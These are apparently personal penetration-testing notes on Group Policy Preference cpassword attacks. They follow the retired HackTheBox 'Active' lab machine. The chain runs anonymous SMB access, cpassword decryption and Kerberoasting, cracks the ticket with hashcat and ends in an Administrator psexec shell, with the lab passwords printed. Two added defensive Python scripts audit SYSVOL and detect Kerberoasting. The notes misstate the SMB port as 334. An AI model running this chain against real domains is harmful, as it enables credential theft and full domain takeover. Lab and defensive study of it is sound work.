GPP/cPassword Attacks

  • GPP will keep passwords in an XML file

  • Works with smb

  • If we find port 334 open we can try to log in anonymously (the session below is from HTB - Active, a retired machine)

  • Tips: prompt off (smbclient will not ask for confirmation on each downloaded file) and recurse on (descends into every subdirectory, so dir and mget cover the whole share)

    ┌──(kali㉿kali)-[~]
    └─$ smbclient \\\\10.10.10.100\\Replication
    Enter WORKGROUP\kali's password: 
    Anonymous login successful
    Try "help" to get a list of possible commands.
    smb: \> dir
      .                                   D        0  Sat Jul 21 06:37:44 2018
      ..                                  D        0  Sat Jul 21 06:37:44 2018
      active.htb                          D        0  Sat Jul 21 06:37:44 2018
    
                    5217023 blocks of size 4096. 260455 blocks available
    smb: \> prompt off
    smb: \> 
  • We can then pull every file with mget *

  • We can copy the cpassword value out of the XML and decrypt it with gpp-decrypt (no cracking needed, the AES key is published by Microsoft):

    gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

    And we get the password: GPPstillStandingStrong2k18
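A defender-side counterpart to the steps above, added here as an example and not code from the original notes: a small Python audit that walks the GPP XML files in SYSVOL (or a local copy of the share) and reports every element that still carries a cpassword attribute, which is exactly what the MS14-025 cleanup asks administrators to find and remove. The sample Groups.xml, its cpassword blob, uid and changed values are constructed placeholders; the list of file names and the SYSVOL path are assumptions.

```python
"""Audit Group Policy Preference XML for leftover cpassword attributes.

Added defender-side example (not from the original notes). It walks the GPP
files that can carry cpassword and reports every element that still has a
non-empty cpassword attribute. Since MS14-025 the GP editor no longer writes
cpassword, but files created before the patch stay in SYSVOL until someone
deletes the preference.
"""
import os
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import List

# Preference files that may contain a cpassword attribute (assumed list)
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}


@dataclass
class Finding:
    path: str       # file the attribute was found in
    element: str    # XML element carrying cpassword
    account: str    # account the credential belongs to, if the element names one
    cpassword: str  # the stored (still AES-encrypted) blob


def audit_gpp_xml(xml_text: str, path: str = "<memory>") -> List[Finding]:
    """Return one Finding per element with a non-empty cpassword attribute."""
    findings = []
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        cpw = elem.attrib.get("cpassword")
        if not cpw:            # missing or cleared ("") is the state we want
            continue
        # Different preference types name the account differently
        account = (elem.attrib.get("userName")
                   or elem.attrib.get("accountName")
                   or elem.attrib.get("runAs")
                   or elem.attrib.get("username")
                   or "?")
        findings.append(Finding(path, elem.tag, account, cpw))
    return findings


def audit_sysvol(sysvol_root: str) -> List[Finding]:
    """Walk a SYSVOL tree (or a copy pulled with smbclient) and audit each GPP file."""
    results = []
    for dirpath, _dirs, files in os.walk(sysvol_root):
        for name in files:
            if name not in GPP_FILES:
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8-sig") as fh:  # GPP files usually carry a BOM
                try:
                    results.extend(audit_gpp_xml(fh.read(), full))
                except ET.ParseError:
                    pass  # malformed file: worth a look, but not a cpassword finding
    return results


# Constructed sample in the shape of a pre-MS14-025 Groups.xml. The cpassword
# value is a made-up placeholder, not a real encrypted blob; uid and changed
# values are placeholders too.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS"
        image="2" changed="2018-01-01 00:00:00" uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="PLACEHOLDER_CPASSWORD_BLOB==" changeLogon="0" noChange="1"
                neverExpires="1" acctDisabled="0" userName="active.htb\\SVC_TGS"/>
  </User>
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="EXAMPLE\\cleared"
        image="2" changed="2018-01-01 00:00:00" uid="{00000000-0000-0000-0000-000000000002}">
    <Properties action="U" cpassword="" userName="EXAMPLE\\cleared"/>
  </User>
</Groups>
"""

if __name__ == "__main__":
    for f in audit_gpp_xml(SAMPLE_GROUPS_XML, "Groups.xml"):
        print(f"{f.path}: <{f.element}> for {f.account} still stores cpassword")
```

Run audit_sysvol against a mounted or copied SYSVOL to get the full list; an empty cpassword="" is treated as already cleaned up, because that is what the editor leaves behind once the credential is removed from the preference.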

HTB - Active - privesc

  • The password obtained from GPP only gave us user-level access. To root the machine we Kerberoast again, this time authenticated as SVC_TGS:

    ┌──(kali㉿kali)-[~]
    └─$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
    /usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
    Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
    
    ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet      LastLogon           
    --------------------  -------------  --------------------------------------------------------  -------------------  -------------------
    active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40  2022-02-11 16:21:53 
    
    $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$50b[STRIPPED]1
  • We can then crack the TGS hash with hashcat (mode 13100):

    ┌──(root💀kali)-[~/active-directory]
    └─# hashcat -m 13100 hashkerb.txt /usr/share/wordlists/rockyou.txt -O
    [STRIPPED]
    $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~4[STRIPPED]1:Ticketmaster1968
  • And finally get a shell as Administrator with psexec.py (Impacket):

    ┌──(root💀kali)-[~/active-directory]
    └─# psexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100  
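The detection side of the Kerberoast step, as an added example (not code from the notes or from Impacket): the hash cracked above starts with $krb5tgs$23$, and etype 23 is RC4-HMAC, which a Windows 4769 event records as TicketEncryptionType 0x17. The Python below scans 4769-style events and flags accounts that obtained RC4 service tickets for accounts that are neither machine accounts nor krbtgt, with a threshold for the burst GetUserSPNs -request produces. The event lines are constructed summaries in a key=value format of our own; the IPs, the sqlsvc/jdoe/WS01 names and the threshold are assumptions.

```python
"""Flag Kerberoasting-style service-ticket requests in Windows 4769 events.

Added detection example (not from the original notes). etype 23 (RC4-HMAC)
appears in a 4769 event as TicketEncryptionType 0x17. A user account getting
RC4 service tickets for accounts that are neither machine accounts nor
krbtgt is the classic Kerberoast signal. The sample events are constructed
key=value summaries of 4769 fields, not Windows' native event format.
"""
from collections import defaultdict
from typing import Dict, List

RC4_HMAC = "0x17"   # TicketEncryptionType value for etype 23


def parse_event(line: str) -> Dict[str, str]:
    """Parse 'Key=value Key=value ...' into a dict (values carry no spaces here)."""
    return dict(kv.split("=", 1) for kv in line.split())


def is_roastable_request(ev: Dict[str, str]) -> bool:
    """True for a successful RC4 TGS request for a non-machine, non-krbtgt service."""
    if ev.get("EventID") != "4769" or ev.get("Status") != "0x0":
        return False
    if ev.get("TicketEncryptionType", "").lower() != RC4_HMAC:
        return False
    svc = ev.get("ServiceName", "")
    # Machine accounts end in '$'; krbtgt tickets are TGT renewals, not SPN tickets
    return not (svc.endswith("$") or svc.lower().startswith("krbtgt"))


def kerberoast_alerts(lines: List[str], min_services: int = 1) -> Dict[str, List[str]]:
    """Map each requesting account to the roastable services it asked for,
    keeping accounts that touched at least `min_services` distinct services.
    GetUserSPNs -request pulls a ticket for every SPN it finds, so a higher
    threshold separates tooling from a single legacy RC4 client."""
    seen = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        if is_roastable_request(ev):
            seen[ev.get("TargetUserName", "?")].add(ev["ServiceName"])
    return {acct: sorted(svcs) for acct, svcs in seen.items() if len(svcs) >= min_services}


# Constructed sample events (field names follow 4769; the line format is our own)
SAMPLE_EVENTS = [
    # user account pulling RC4 tickets for two SPN-bearing accounts: roastable
    "EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=Administrator "
    "TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:10.10.14.5",
    "EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=sqlsvc "
    "TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:10.10.14.5",
    # workstation getting an AES ticket for the DC's machine account: normal traffic
    "EventID=4769 TargetUserName=WS01$@ACTIVE.HTB ServiceName=DC$ "
    "TicketEncryptionType=0x12 Status=0x0 IpAddress=::ffff:10.10.10.50",
    # RC4 ticket for krbtgt is a TGT renewal, not an SPN ticket
    "EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=krbtgt "
    "TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:10.10.14.5",
    # failed request (0x7 = server principal unknown): nothing was issued
    "EventID=4769 TargetUserName=jdoe@ACTIVE.HTB ServiceName=nosuchsvc "
    "TicketEncryptionType=0x17 Status=0x7 IpAddress=::ffff:10.10.10.51",
]

if __name__ == "__main__":
    for account, services in kerberoast_alerts(SAMPLE_EVENTS, min_services=2).items():
        print(f"possible Kerberoast by {account}: {', '.join(services)}")
```

In a real SIEM the same three conditions (RC4 etype, successful status, service is a user account with an SPN) are the rule; the per-account distinct-service count is what separates a GetUserSPNs sweep from one legacy application that still negotiates RC4.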

GPP - Resources
